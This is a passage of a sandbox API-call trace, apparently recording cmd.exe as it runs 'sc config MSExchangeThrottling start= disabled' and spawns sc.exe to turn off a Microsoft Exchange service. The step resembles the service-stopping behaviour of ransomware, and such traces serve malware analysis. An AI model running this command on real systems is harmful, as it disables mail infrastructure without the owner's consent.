lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x50bf9c8 | out: phkResult=0x50bf9c8*=0x0) returned 0x2 [0133.939] VirtualQuery (in: lpAddress=0x50bf9cf, lpBuffer=0x50bf980, dwLength=0x1c | out: lpBuffer=0x50bf980*(BaseAddress=0x50bf000, AllocationBase=0x4fc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.939] VirtualQuery (in: lpAddress=0x4fc0000, lpBuffer=0x50bf980, dwLength=0x1c | out: lpBuffer=0x50bf980*(BaseAddress=0x4fc0000, AllocationBase=0x4fc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.939] VirtualQuery (in: lpAddress=0x4fc1000, lpBuffer=0x50bf980, dwLength=0x1c | out: lpBuffer=0x50bf980*(BaseAddress=0x4fc1000, AllocationBase=0x4fc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.939] VirtualQuery (in: lpAddress=0x4fc3000, lpBuffer=0x50bf980, dwLength=0x1c | out: lpBuffer=0x50bf980*(BaseAddress=0x4fc3000, AllocationBase=0x4fc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.939] VirtualQuery (in: lpAddress=0x50c0000, lpBuffer=0x50bf980, dwLength=0x1c | out: lpBuffer=0x50bf980*(BaseAddress=0x50c0000, AllocationBase=0x50c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.939] GetConsoleOutputCP () returned 0x1b5 [0133.939] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.940] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0133.940] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.940] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0133.940] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.940] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.940] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.940] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.940] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.940] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.940] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.940] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0133.941] GetEnvironmentStringsW () returned 0x5147da8* [0133.941] FreeEnvironmentStringsA (penv="A") returned 1 [0133.941] GetEnvironmentStringsW () returned 0x5147da8* [0133.941] FreeEnvironmentStringsA (penv="A") returned 1 [0133.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x50be92c | out: phkResult=0x50be92c*=0x94) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0xd8, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x1, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0x1, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x0, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x40, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x40, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0x40, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegCloseKey (hKey=0x94) returned 0x0 [0133.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x50be92c | out: phkResult=0x50be92c*=0x94) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0x40, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x1, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0x1, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x0, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x9, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x4, lpData=0x50be938*=0x9, lpcbData=0x50be934*=0x4) returned 0x0 [0133.941] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x50be930, lpData=0x50be938, lpcbData=0x50be934*=0x1000 | out: lpType=0x50be930*=0x0, lpData=0x50be938*=0x9, lpcbData=0x50be934*=0x1000) returned 0x2 [0133.941] RegCloseKey (hKey=0x94) returned 0x0 [0133.942] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29836 [0133.942] srand (_Seed=0x5ad29836) [0133.942] GetCommandLineW () returned="/c sc config MSExchangeThrottling start= disabled" [0133.942] GetCommandLineW () returned="/c sc config MSExchangeThrottling start= disabled" [0133.942] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.942] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5149d00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0133.942] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.942] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.942] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.942] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.942] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.942] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.942] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.942] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.942] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.942] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.942] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.942] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.942] GetEnvironmentStringsW () returned 0x5147da8* [0133.942] FreeEnvironmentStringsA (penv="A") returned 1 [0133.942] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.942] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.942] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.942] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.942] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.943] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.943] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.943] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.943] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.943] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x50bf704 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.943] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x50bf704, lpFilePart=0x50bf6fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x50bf6fc*="Desktop") returned 0x1d [0133.943] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.943] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x50bf480 | out: lpFindFileData=0x50bf480) returned 0x51405c8 [0133.943] FindClose (in: hFindFile=0x51405c8 | out: hFindFile=0x51405c8) returned 1 [0133.943] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x50bf480 | out: lpFindFileData=0x50bf480) returned 0x51405c8 [0133.943] FindClose (in: hFindFile=0x51405c8 | out: hFindFile=0x51405c8) returned 1 [0133.943] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0133.943] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x50bf480 | out: lpFindFileData=0x50bf480) returned 0x51405c8 [0133.943] FindClose (in: hFindFile=0x51405c8 | out: hFindFile=0x51405c8) returned 1 [0133.943] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.943] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0133.943] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0133.943] GetEnvironmentStringsW () returned 0x5147da8* [0133.944] FreeEnvironmentStringsA (penv="=") returned 1 [0133.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.944] GetConsoleOutputCP () returned 0x1b5 [0133.944] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.944] GetUserDefaultLCID () returned 0x409 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x50bf834, cchData=128 | out: lpLCData="0") returned 2 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x50bf834, cchData=128 | out: lpLCData="0") returned 2 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x50bf834, cchData=128 | out: lpLCData="1") returned 2 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0133.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0133.945] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0133.945] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.945] GetConsoleTitleW (in: lpConsoleTitle=0x514aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.946] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.946] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0133.946] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0133.946] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0133.946] _wcsicmp (_String1="sc", _String2=")") returned 74 [0133.946] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0133.946] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0133.946] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0133.946] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0133.946] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0133.946] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0133.947] GetConsoleTitleW (in: lpConsoleTitle=0x50bf520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.947] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.947] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.947] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.947] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.947] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.948] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.948] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.948] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.948] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.948] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.948] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.948] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.948] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.948] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.948] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.948] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.948] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.948] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.948] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.948] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.948] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.948] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.948] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.948] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.948] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.948] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.948] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.948] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.948] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.948] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.948] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.948] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.948] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.948] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.948] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.948] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.949] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.949] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.949] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.949] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.949] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.949] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.949] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.949] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.949] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.949] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.949] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.949] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.949] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.949] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.949] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.949] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.949] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.949] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.949] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.949] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.949] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.949] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.949] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0133.949] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0133.949] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0133.949] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0133.949] SetErrorMode (uMode=0x0) returned 0x0 [0133.949] SetErrorMode (uMode=0x1) returned 0x0 [0133.949] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51405d0, lpFilePart=0x50bf02c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x50bf02c*="Desktop") returned 0x1d [0133.949] SetErrorMode (uMode=0x0) returned 0x1 [0133.949] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.949] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.957] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.957] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.957] GetConsoleTitleW (in: lpConsoleTitle=0x50bf2ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.957] InitializeProcThreadAttributeList (in: lpAttributeList=0x50bf1d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x50bf1bc | out: lpAttributeList=0x50bf1d8, lpSize=0x50bf1bc) returned 1 [0133.957] UpdateProcThreadAttribute (in: lpAttributeList=0x50bf1d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x50bf1c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x50bf1d8, lpPreviousValue=0x0) returned 1 [0133.957] GetStartupInfoW (in: lpStartupInfo=0x50bf210 | out: lpStartupInfo=0x50bf210*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.957] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.958] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.958] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.959] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeThrottling start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x50bf160*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeThrottling start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 